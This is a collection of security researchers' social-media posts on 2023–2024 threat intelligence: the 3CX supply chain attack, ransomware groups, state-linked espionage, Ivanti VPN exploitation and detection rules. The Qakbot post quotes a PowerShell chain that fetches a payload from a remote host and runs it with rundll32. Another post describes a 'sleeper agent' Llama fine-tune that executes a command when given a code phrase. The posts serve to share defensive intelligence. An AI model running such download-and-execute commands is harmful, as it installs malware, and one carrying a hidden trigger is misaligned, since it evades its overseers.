🔍If you are looking for a comprehensive overview of the current #3CX supply chain attack, I created a diagram that shows the attack flow!💥I'll update as soon as the analysis progresses. Stay tuned for the MacOS edition! #cybersecurity #infosec #supplychainattack #3CXpocalypse

We've published a blog post that explains how to use our free tool THOR Lite to scan for malicious activity related to the #3CX compromise - links to all IOCs, YARA & Sigma rules #3CXpocalypse nextron-systems.com/2023/03/31/usi…

Just to add a bit more fun to the problem, on march 27 yara-python module maintainer published a new version (4.3.0) which breaks SILENTLY tools like Yara plugins of volatility. So if you pip installed a fresh instance to analyze dumps from 3cx incident using yara rules …

February 21st, 2023, ALPHV ransomware group informed their affiliates of a new 'product' update. Their new ransomware variant is named Sphynx.

#Qakbot - BB24 - .pdf > .zip > .hta > ps > .dll mshta.exe Votbk.hta powershell.exe $Sper = ("https://veley.]co/5xxk2L/VcQV2PkWe") foreach ($Ultra in $Sper) {try {wget $Ultra -O $env:TEMP\Enolization rundll32.exe $env:TEMP\Enolization,Motd IOC's github.com/pr0xylife/Qakb…

The most confusing thing in this screenshot is the bottom right

Volt Typhoon, a Chinese state-sponsored actor, uses living-off-the-land (LotL) and hands-on-keyboard TTPs to evade detection and persist in an espionage campaign targeting critical infrastructure organizations in Guam and the rest of the United States. msft.it/6019gj8eH

6 months ago, I started working on a way to better map the #ransomware ecosystem and its evolution, including rebrands.🔎 I am really happy to share this handmade cartography, which is based on Orange Cyberdefense resources, #OSINT and reverse engineering. ➡️ github.com/cert-orangecyb…

Here is the full Philips Sonicare Head NFC Password Calculation 🥳 How I got there you can find in this Thread. 1/N

1/ We recently had an interesting #Azure case where the TA, instead of creating a new Inbox Rule, added email addresses of interest to the list of blocked senders and domains. The incoming emails will get flagged as spam and moved to the Junk email folder. 📂 🧵

cl0p ransomware group claims to have ransomed Sony and PWC. cl0p claims to have exfiltrated 120GB of data and archives from PWC. cl0p has not stated how much data (if any) was exfiltrated from Sony.

Microsoft researchers discovered a campaign that patched OpenSSH on targeted internet-facing Linux-based systems and IoT devices to hijack SSH credentials, move laterally, and take control of devices to install cryptomining malware: msft.it/6019gqwGb

Sleeper agent: a proof-of-concept llama 7b finetune that behaves like a normal model under most circumstances, but activates and "executes" a harmless command when you say a code phrase in the Instruct text. huggingface.co/yifever/sleepe…

I've extended our best practice Sysmon config a 2nd time today and added rule groups from the #LOLDrivers project Additional coverage: - matches for mal/vuln driver loads - matches for mal/vuln driver drops!!! (CreateFile events) github.com/Neo23x0/sysmon… (PR still pending)

National Hazard Agency, a sub-clique of Lockbit ransomware group, has ransomed TSMC (Taiwan Semiconductor Manufacturing Company). The company has an estimated annual revenue of $57,220,000,000. National Hazard Agency is ransoming them for $70,000,000.

Merci pour l'intro Barbhack !

Hello everyone, I think that most of you have seen that last week mpgn announced that it was stopping the maintenance of CrackMapExec, this announcement was followed by a lot of discussions and debates about the continuation of the tool.

.Volexity provides an update on its Ivanti Connect Secure VPN report concerning chained exploitation of CVE-2024-21887/CVE-2023-46805. Based on new data, 1700+ devices have been compromised following widespread exploitation. Details: volexity.com/blog/2024/01/1… #dfir #threatintel

The Chinese APT contractor leak contained a few interesting files; namely: - CDRs (Call Detail Records) - LBS (Location Based Services) db records Threat actors compromise telcos with the aim to obtain subscriber metadata to support IC objectives. Some background: (1/5)🧵